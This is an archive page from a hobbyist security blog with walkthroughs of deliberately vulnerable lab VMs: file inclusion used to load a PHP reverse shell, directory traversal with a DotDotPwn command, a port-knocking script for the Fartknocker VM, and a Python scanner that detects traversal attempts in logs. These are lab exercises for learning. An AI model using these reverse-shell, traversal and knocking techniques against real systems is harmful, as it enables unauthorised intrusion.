L3ft's Randomness - Random Gibberish from an Internet Hobo.<br />
<h1>SSH Poisoning via LFI</h1>
2020-05-22<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpKpoDPbJ_nRvDzavPpB1WfFRqPIHcULfnUv_x-Xakb7pDx9Bu4ugI29b53qWNhgJspDa4vReVkSBQ03ns2STpiMRV7uA65ETr0j3ef-bN0XU3xoXx9vD4oEUcyle2huCdS5L2T99aaTA/s1600/DKhNl9fXoAAOSB2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="477" data-original-width="680" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpKpoDPbJ_nRvDzavPpB1WfFRqPIHcULfnUv_x-Xakb7pDx9Bu4ugI29b53qWNhgJspDa4vReVkSBQ03ns2STpiMRV7uA65ETr0j3ef-bN0XU3xoXx9vD4oEUcyle2huCdS5L2T99aaTA/s640/DKhNl9fXoAAOSB2.jpeg" width="640" /></a></div>
<br />
<h1>Web for Pentester - File Inclusion</h1>
2015-05-30<br />
There are two types of file inclusion: <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" target="_blank">Local</a> and <a href="https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion" target="_blank">Remote</a>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFy4VOh_YH2FIUwYMM3SV_JW79vdewpgXmsvz9_FIH7qambFE2fUpF-WaYCZt5hSvxgcaN_K36xuLKoNS9FHu8jf6MCr2ZrlyIZ6nlAGpDNT2D30-mrWqc9CvcjbvD12ZzhpJNG8ezfA/s1600/Screenshot+-+300515+-+20%253A09%253A10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFy4VOh_YH2FIUwYMM3SV_JW79vdewpgXmsvz9_FIH7qambFE2fUpF-WaYCZt5hSvxgcaN_K36xuLKoNS9FHu8jf6MCr2ZrlyIZ6nlAGpDNT2D30-mrWqc9CvcjbvD12ZzhpJNG8ezfA/s400/Screenshot+-+300515+-+20%253A09%253A10.png" width="400" /></a></div>
<h4>
Example 1.</h4>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJCTngel7Msd0bZsGaxSCE3bOPOS2tWbkhW5ph4dFS1HUSsymv6naiMSCnkla41DjFIzpMxePOktK4iVSIRrSg5KA83xRODtBUkqIs0hAx_3Ik7GEb6xBaV1NA5KKsWumdmqC6Cxp6aI/s1600/Screenshot+-+300515+-+20%253A14%253A54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJCTngel7Msd0bZsGaxSCE3bOPOS2tWbkhW5ph4dFS1HUSsymv6naiMSCnkla41DjFIzpMxePOktK4iVSIRrSg5KA83xRODtBUkqIs0hAx_3Ik7GEb6xBaV1NA5KKsWumdmqC6Cxp6aI/s400/Screenshot+-+300515+-+20%253A14%253A54.png" width="400" /></a></div>
<br />
Below is an example of Local File Inclusion. Remote File Inclusion is also an option, but I will cover that in Example 2.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7YoIybaH6Hx8eyQMGM6L1bZ0DmaZiPe0RgJpAsDR-KRjDQz1w7KY82QqVkCOW_63YE9a2KouQ3SU5XDaqIsr9-lhs-nkCYUf9HrY2q6Q5CfjkWHKay7NZNyJ5i27EWvuRx9jwJp5wZ8E/s1600/Screenshot+-+300515+-+20%253A08%253A04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7YoIybaH6Hx8eyQMGM6L1bZ0DmaZiPe0RgJpAsDR-KRjDQz1w7KY82QqVkCOW_63YE9a2KouQ3SU5XDaqIsr9-lhs-nkCYUf9HrY2q6Q5CfjkWHKay7NZNyJ5i27EWvuRx9jwJp5wZ8E/s400/Screenshot+-+300515+-+20%253A08%253A04.png" width="400" /></a></div>
<br />
<br />
<br />
<h4>
Example 2.</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG0OAKpIahSZ2P1jkDt38PfwKg3Y2WijdF02eVTBTo6yuJ9vbxQ5u5sVwv26RTYQFDYNWQPME86cvX7TfCkcWYk2fnmnVIje3juEoB7UCZc5QhJxhoS8o-KcPwhj240aMx-S_HPHD3WAg/s1600/Screenshot+-+300515+-+20%253A19%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG0OAKpIahSZ2P1jkDt38PfwKg3Y2WijdF02eVTBTo6yuJ9vbxQ5u5sVwv26RTYQFDYNWQPME86cvX7TfCkcWYk2fnmnVIje3juEoB7UCZc5QhJxhoS8o-KcPwhj240aMx-S_HPHD3WAg/s400/Screenshot+-+300515+-+20%253A19%253A40.png" width="400" /></a></div>
I decided to use Pentest Monkey's <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" target="_blank">php reverse shell</a>; after a quick edit, it was good to go.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS2d9-_IlHya_r9FUVHetOOHO02_l645bh4ByLFSSqYp82E8XIQ0bUx7Y-wxmA6b-0wQy7sYlbj6WqwUR_kLuLWHZt_t15rQcPSu3olO3_h6q6I9vUhVtmGuZncQXr5x2CjNCi8RHjiuI/s1600/Screenshot+-+300515+-+20%253A27%253A15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS2d9-_IlHya_r9FUVHetOOHO02_l645bh4ByLFSSqYp82E8XIQ0bUx7Y-wxmA6b-0wQy7sYlbj6WqwUR_kLuLWHZt_t15rQcPSu3olO3_h6q6I9vUhVtmGuZncQXr5x2CjNCi8RHjiuI/s320/Screenshot+-+300515+-+20%253A27%253A15.png" width="320" /></a></div>
<br />
<br />
I used <a href="http://effbot.org/librarybook/simplehttpserver.htm" target="_blank">Python's built-in SimpleHTTPServer</a> to host the script on my machine, and set up a simple netcat listener for it to connect back to.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0-rtvAhFrm0pb2gkgHflmSnWoqyIcybbPCfxtMfdH7I-uUpntR2Uob9TUFCHu6XK2g01F7s9pJUnhW0IC4mefMyJE_v1H-bKAND-DymIVKtIWmMA6gOblH_9bYbKunEXS7k1nClHng8/s1600/Screenshot+-+160515+-+17%253A37%253A19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0-rtvAhFrm0pb2gkgHflmSnWoqyIcybbPCfxtMfdH7I-uUpntR2Uob9TUFCHu6XK2g01F7s9pJUnhW0IC4mefMyJE_v1H-bKAND-DymIVKtIWmMA6gOblH_9bYbKunEXS7k1nClHng8/s400/Screenshot+-+160515+-+17%253A37%253A19.png" width="400" /></a></div>
<br />
<br />
Alas!<br />
<br />
Remote File Inclusion of the php-reverse-shell, which connected back to my netcat listener.<br />
<br />
I won't cover escalation; that is for another day.<br />
For now a foothold will suffice =)<br />
<br />
<br />
<br />
<br />
Thanks for reading.<br />
<br />
<h1>Web for Pentester - Directory Traversal</h1>
2015-05-30<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOK-iQdQ0wpomc5sHkEwXBLzjwnQkuU8W9hj1liXAOsH_GZ83h4dq23mbWU2IlxIHorJGsrYxen63vnI4TQhlkGM52k18BK5JLOms3XePQy-eNPYkkFGlhfdYcR5gWiiNry0RthfyBzuk/s1600/Screenshot+-+300515+-+19%253A10%253A14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOK-iQdQ0wpomc5sHkEwXBLzjwnQkuU8W9hj1liXAOsH_GZ83h4dq23mbWU2IlxIHorJGsrYxen63vnI4TQhlkGM52k18BK5JLOms3XePQy-eNPYkkFGlhfdYcR5gWiiNry0RthfyBzuk/s400/Screenshot+-+300515+-+19%253A10%253A14.png" width="400" /></a></div>
There are three examples to complete.<br />
<br />
Viewing the source shows these more clearly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglH83sGa1X9mdvZ5yJpMXxBWk99MxN7ZNECep5PNsBq7h2xKMyKg0Uzth79Swe5mWQqkrx__zxrpJD71_eWNfC2hQkVuPV2yGfcQwNpSkyP6mMXKjXurTl8zvqwXKUbQ0bx-Bcrrh1Al8/s1600/Screenshot+-+300515+-+19%253A12%253A01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglH83sGa1X9mdvZ5yJpMXxBWk99MxN7ZNECep5PNsBq7h2xKMyKg0Uzth79Swe5mWQqkrx__zxrpJD71_eWNfC2hQkVuPV2yGfcQwNpSkyP6mMXKjXurTl8zvqwXKUbQ0bx-Bcrrh1Al8/s400/Screenshot+-+300515+-+19%253A12%253A01.png" width="400" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. No real issues.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy4noOkAQbQgxMJDs_2bhzfQiwYvZaTroZXj8V4AAntA1r2bZnMCjKkmYWRLuxxgDOHBTSeyjSYxzrvyC7xb1hTVOebuwv2Mv2onmVoPO-9RYFZnJhy6m47U0qOa0ird2EPdO3KVRtOB4/s1600/Screenshot+-+300515+-+11%253A43%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy4noOkAQbQgxMJDs_2bhzfQiwYvZaTroZXj8V4AAntA1r2bZnMCjKkmYWRLuxxgDOHBTSeyjSYxzrvyC7xb1hTVOebuwv2Mv2onmVoPO-9RYFZnJhy6m47U0qOa0ird2EPdO3KVRtOB4/s400/Screenshot+-+300515+-+11%253A43%253A47.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. A different approach, as the first method didn't work.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf_GD7l_DC9DIwOJI7VnWarMKYCDcDzAhVL_Y6M1ntBdv-XOdhpqvFNhLdvLkCzPUXf32qTD1xFkqhafiKMmYbPZjYJSWlZBa5GUXEQExo125M-NE2AWxRYl1QCyuLYZmkHioKCp10nnk/s1600/Screenshot+-+300515+-+11%253A45%253A16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf_GD7l_DC9DIwOJI7VnWarMKYCDcDzAhVL_Y6M1ntBdv-XOdhpqvFNhLdvLkCzPUXf32qTD1xFkqhafiKMmYbPZjYJSWlZBa5GUXEQExo125M-NE2AWxRYl1QCyuLYZmkHioKCp10nnk/s400/Screenshot+-+300515+-+11%253A45%253A16.png" width="400" /> </a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. This was much harder; after trying a few options, I decided to employ <a href="http://dotdotpwn.blogspot.co.uk/" target="_blank">DotDotPwn</a> to find it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>perl dotdotpwn.pl -m http-url -h 192.168.56.101 -u http://192.168.56.101/dirtrav/example3.php?file=TRAVERSAL -o unix -b -k root</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguTFMBRTsLTHw1xAGxDHz9LVC0HK0ot4AFu0PZDS6OcjEENi6gZkeozgHEbCm_FC0esGDbv10WO87ki47Y5IZEIN_caTd4M5-b-VNP9vHl-2rqEJVEXnQ20OfFpZfnE6g4evnDQrrd4hI/s1600/Screenshot+-+300515+-+16%253A25%253A38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguTFMBRTsLTHw1xAGxDHz9LVC0HK0ot4AFu0PZDS6OcjEENi6gZkeozgHEbCm_FC0esGDbv10WO87ki47Y5IZEIN_caTd4M5-b-VNP9vHl-2rqEJVEXnQ20OfFpZfnE6g4evnDQrrd4hI/s400/Screenshot+-+300515+-+16%253A25%253A38.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Found! </div>
<div class="separator" style="clear: both; text-align: left;">
Now to test it in a browser.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbNuBH3kZWfkuyTMqTJjkKvXp1pqb1EtP3BT9ZZsbyaeMsIcrCbguRlpHTT4GqW44iAwd06nYQ5wCCACowo97jwGMAbkS6MXeEnQJJRGYc9DvGz8GYrx7OzgIYPWhNjm7-3qb-lQQmuPo/s1600/Screenshot+-+300515+-+16%253A26%253A22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbNuBH3kZWfkuyTMqTJjkKvXp1pqb1EtP3BT9ZZsbyaeMsIcrCbguRlpHTT4GqW44iAwd06nYQ5wCCACowo97jwGMAbkS6MXeEnQJJRGYc9DvGz8GYrx7OzgIYPWhNjm7-3qb-lQQmuPo/s400/Screenshot+-+300515+-+16%253A26%253A22.png" width="400" /></a></div>
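DotDotPwn works by throwing many encodings of the same parent-directory step at the file= parameter, which is also what makes a run like the one above easy to spot on the server side. Added example (not code from the original post): it normalises query-string values in constructed Apache access-log lines, decoding repeated percent-encoding and folding backslashes, then flags each traversal attempt and any source address sending enough of them to look like a fuzzing run; the log lines, addresses and the burst threshold are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (assumed; not taken from the VM's real logs).
SAMPLE_LOG = """\
192.168.56.1 - - [30/May/2015:16:25:38 +0100] "GET /dirtrav/example3.php?file=../../../../etc/passwd HTTP/1.1" 200 1042 "-" "DotDotPwn"
192.168.56.1 - - [30/May/2015:16:25:38 +0100] "GET /dirtrav/example3.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1042 "-" "DotDotPwn"
192.168.56.1 - - [30/May/2015:16:25:39 +0100] "GET /dirtrav/example3.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1042 "-" "DotDotPwn"
192.168.56.1 - - [30/May/2015:16:25:39 +0100] "GET /dirtrav/example3.php?file=..%00/etc/passwd HTTP/1.1" 200 512 "-" "DotDotPwn"
192.168.56.1 - - [30/May/2015:16:25:40 +0100] "GET /dirtrav/example3.php?file=..\\..\\..\\etc\\passwd HTTP/1.1" 200 1042 "-" "DotDotPwn"
192.168.56.50 - - [30/May/2015:16:30:01 +0100] "GET /dirtrav/example3.php?file=hacker.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.168.56.50 - - [30/May/2015:16:30:02 +0100] "GET /dirtrav/example1.php?file=../../../../etc/passwd HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Once fully decoded, every variant collapses to a parent-directory step or a NUL truncation.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.$|\x00)")


def normalize(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (double-encoded %252e..) and fold backslashes to slashes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def is_traversal(param_value: str) -> bool:
    return TRAVERSAL_RE.search(normalize(param_value)) is not None


def scan_log(text: str, burst_threshold: int = 3) -> Dict[str, object]:
    """Flag every request whose query string carries a traversal, and the IPs sending bursts of them."""
    hits: List[Dict[str, object]] = []
    per_ip: Dict[str, int] = defaultdict(int)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["path"])
        # parse_qs already decodes one layer; normalize() handles any remaining layers.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if is_traversal(value):
                    hits.append({"ip": m["ip"], "script": parts.path, "param": name,
                                 "value": value, "status": int(m["status"])})
                    per_ip[m["ip"]] += 1
    fuzzers = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return {"hits": hits, "per_ip": dict(per_ip), "fuzzers": fuzzers}


if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for hit in result["hits"]:
        print(f'{hit["ip"]} -> {hit["script"]} {hit["param"]}={hit["value"]!r} ({hit["status"]})')
    print("likely fuzzing sources:", result["fuzzers"])
```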
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Further Reading can be found here:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.owasp.org/index.php/Path_Traversal" target="_blank">Owasp Path Traversal</a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thanks for reading.</div>
2015-05-30<br />
<h1 style="text-align: center;">
<span style="font-weight: normal;"><u>Web for Pentester </u></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhdxZCeeWj_S8WJs2YYZE1BWQrfOrcApZU6-47PUhGhmuYW9vk7MH0lHo4eSF__OramuFoIpCnRuPjRz3_XUE3_Bp0CDhWfeGxw54OTV7jTLV1XlZm3y6KTJyhvz6dpKR1ANYzV4Oq8g/s1600/web_for_pentester.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhdxZCeeWj_S8WJs2YYZE1BWQrfOrcApZU6-47PUhGhmuYW9vk7MH0lHo4eSF__OramuFoIpCnRuPjRz3_XUE3_Bp0CDhWfeGxw54OTV7jTLV1XlZm3y6KTJyhvz6dpKR1ANYzV4Oq8g/s320/web_for_pentester.png" width="320" /></a></div>
<h1 style="text-align: center;">
<a href="https://pentesterlab.com/exercises/web_for_pentester/course" target="_blank">Pentesterlab Course</a></h1>
<h1 style="text-align: center;">
<a href="https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/" target="_blank">VulnHub.com link </a></h1>
<div class="separator" style="clear: both; text-align: left;">
This VM is a very nice collection of the different web vulnerabilities.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHYcOY23AC4X3NCSRiigrJblU0L2JMF7OUiFzhYR-p920iHgDh7F45Mi05mthfIxi0UG6kCwsg1_Wvf1aCVSQruAsorXhVCrukr_nL4vMOOR7w0fE_WRijoL1mq8IvBOpeWg5WiMEDfY/s1600/Screenshot+-+300515+-+19%253A02%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHYcOY23AC4X3NCSRiigrJblU0L2JMF7OUiFzhYR-p920iHgDh7F45Mi05mthfIxi0UG6kCwsg1_Wvf1aCVSQruAsorXhVCrukr_nL4vMOOR7w0fE_WRijoL1mq8IvBOpeWg5WiMEDfY/s320/Screenshot+-+300515+-+19%253A02%253A52.png" width="320" /></a></div>
<h4>
The pre-write-up bit</h4>
<div class="separator" style="clear: both; text-align: left;">
Note: I don't do any of this for a living, and I don't claim to be all-knowing.</div>
<div class="separator" style="clear: both; text-align: left;">
Any findings will be very brief, and sometimes incomplete.</div>
<div class="separator" style="clear: both; text-align: left;">
And of course, it's gonna be back to front.</div>
<div class="separator" style="clear: both; text-align: left;">
I'll decide on formatting it later on, but at the moment, I can't be bothered =)</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://c0ntactl3ft.blogspot.co.uk/2015/05/web-for-pentester-directory-traversal.html" target="_blank">Directory Traversal</a></div>
2015-05-07<br />
<br />
<div style="text-align: center;">
A little picture I knocked up on a break from <a href="https://www.vulnhub.com/entry/darknet-10,120/" target="_blank">Darknet VM </a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFgCAH1_jG8cP1v-6gk6QgbmWkH7xsnLIfqt79V___LSW4I0FJcUzK6lEPbEhiEdmf2ScU3d7G-LpXGviE1uMf6PsMs48VoFsxCy8_HLJXzUUvT60EBPHRyd9IdJf9BaTsols3hPuqpQ/s1600/tmp_17207-IMG_20150507_201631-502871758.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFgCAH1_jG8cP1v-6gk6QgbmWkH7xsnLIfqt79V___LSW4I0FJcUzK6lEPbEhiEdmf2ScU3d7G-LpXGviE1uMf6PsMs48VoFsxCy8_HLJXzUUvT60EBPHRyd9IdJf9BaTsols3hPuqpQ/s320/tmp_17207-IMG_20150507_201631-502871758.jpg" width="320" /></a></div>
<br />
<h1>TopHatSec - Fartknocker VM - Hosted on Vulnhub</h1>
2015-04-16<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2b8w3a-v_JmLVDspiS6DbUfelReNFOeHnbSOXql8WCzqlmeP4nWUXbMaXdRwQ3AUCTPfMcfSvqq2D_9Z_VZro5i6C8HSvoxV6ZeFTBwgB1V-wZeuhGalEhK0N8srnB9g2nPHCikLs9M/s1600/fartknocker+Screenshot+-+150415+-+23:50:03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2b8w3a-v_JmLVDspiS6DbUfelReNFOeHnbSOXql8WCzqlmeP4nWUXbMaXdRwQ3AUCTPfMcfSvqq2D_9Z_VZro5i6C8HSvoxV6ZeFTBwgB1V-wZeuhGalEhK0N8srnB9g2nPHCikLs9M/s320/fartknocker+Screenshot+-+150415+-+23:50:03.png" /> </a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><u><b>Discovery:</b></u></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: #351c75; font-size: small;"><i>arp gives:</i></span><span style="font-size: small;"> </span><br />
<span style="font-size: small;"><br /> </span><br />
<pre>Address HWtype HWaddress Flags Mask Iface
192.168.56.102 ether 08:00:27:91:bc:58 C vboxnet0</pre>
<span style="font-size: small;"><u><b>Scan: </b></u></span><br />
<br />
<span style="font-size: small;"><br /></span>
<pre>Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker 192.168.56.102
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.18 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds</pre>
<span style="font-size: small;"><i><span style="color: blue;">The scan shows a webserver running.</span></i></span><br />
<span style="font-size: small;"><b><u>Webscan:</u></b></span><br />
<span style="font-size: small;"><i><br /></i></span>
<pre>- Nikto v2.1.5/2.1.5
+ Target Host: 192.168.56.101
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ -3233: GET /icons/README: /icons/README: Apache default file found</pre>
<span style="color: blue; font-size: small;"><i>Not much from that.......</i></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><i>So I decided to visit the page with a browser.</i></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBwdfXGfnh-2xerSvz7Lp1xsev4bg7R7_s0DjDdOc1eGNePbfLcIL-jex09sdPxkgUG63AJnZaS_20AT7RJhgDu-UW9HWss6_4IDlnUYV6V0Gdn7-NQ_TydIrazfbjJzC4FYci1kQCIeU/s1600/First+Screenshot+-+150415+-+22:34:52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBwdfXGfnh-2xerSvz7Lp1xsev4bg7R7_s0DjDdOc1eGNePbfLcIL-jex09sdPxkgUG63AJnZaS_20AT7RJhgDu-UW9HWss6_4IDlnUYV6V0Gdn7-NQ_TydIrazfbjJzC4FYci1kQCIeU/s320/First+Screenshot+-+150415+-+22:34:52.png" height="106" width="400" /></a></span></div>
<span style="font-size: small;"><i><span style="color: blue;">The link "Wooah" gives pcap1.pcap.</span></i></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<i><span style="color: blue;"><span style="font-size: small;"><br /></span>
</span></i><br />
<i><span style="color: blue;">Opening it up with Wireshark gives a lot of ICMP flying back and forth; however, lower down something is happening.</span></i><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdt9g5V4cyhXkL7sZjY5CokR9y0-DSCpfw6LCXZzkxRjY573P6MpiO_ErG0Z_UUp2tsjRo9IX3jrkjry8Yz0uiVDTVEXlcpk1qIr9JVjVGb-6aqyJzgY-6ukcVuZQTXZGTLr2vrjuDuww/s1600/wireshark+Screenshot+-+150415+-+22:39:30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdt9g5V4cyhXkL7sZjY5CokR9y0-DSCpfw6LCXZzkxRjY573P6MpiO_ErG0Z_UUp2tsjRo9IX3jrkjry8Yz0uiVDTVEXlcpk1qIr9JVjVGb-6aqyJzgY-6ukcVuZQTXZGTLr2vrjuDuww/s320/wireshark+Screenshot+-+150415+-+22:39:30.png" height="178" width="400" /></a></span></div>
<span style="color: blue; font-size: small;"><i>TCP Ports 7000, 8000, 9000 and 8888 are used.<br /> </i></span><br />
<span style="color: blue; font-size: small;"><i>I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place).<br /><br />Given my Python abilities are... basic to say the least, I knocked up a simple bash script utilising netcat.</i></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div style="text-align: justify;">
<br />
<pre>cat knock1.sh 
#!/bin/bash
# Connect to the four ports seen in pcap1.pcap, in the order they appeared in the capture.
# The first three connections are refused; the fourth succeeds and returns the /burgerworld/ hint.
nc -v 192.168.56.102 7000
nc -v 192.168.56.102 8000
nc -v 192.168.56.102 9000
nc -v 192.168.56.102 8888</pre>
<br />
</div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;">After a few frustrating attempts, it finally worked!</span></i></span><br />
<br />
<pre>./knock1.sh 
nc: connect to 192.168.56.102 port 7000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 8000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9000 (tcp) failed: Connection refused
Connection to 192.168.56.102 8888 port [tcp/*] succeeded!
/burgerworld/</pre>
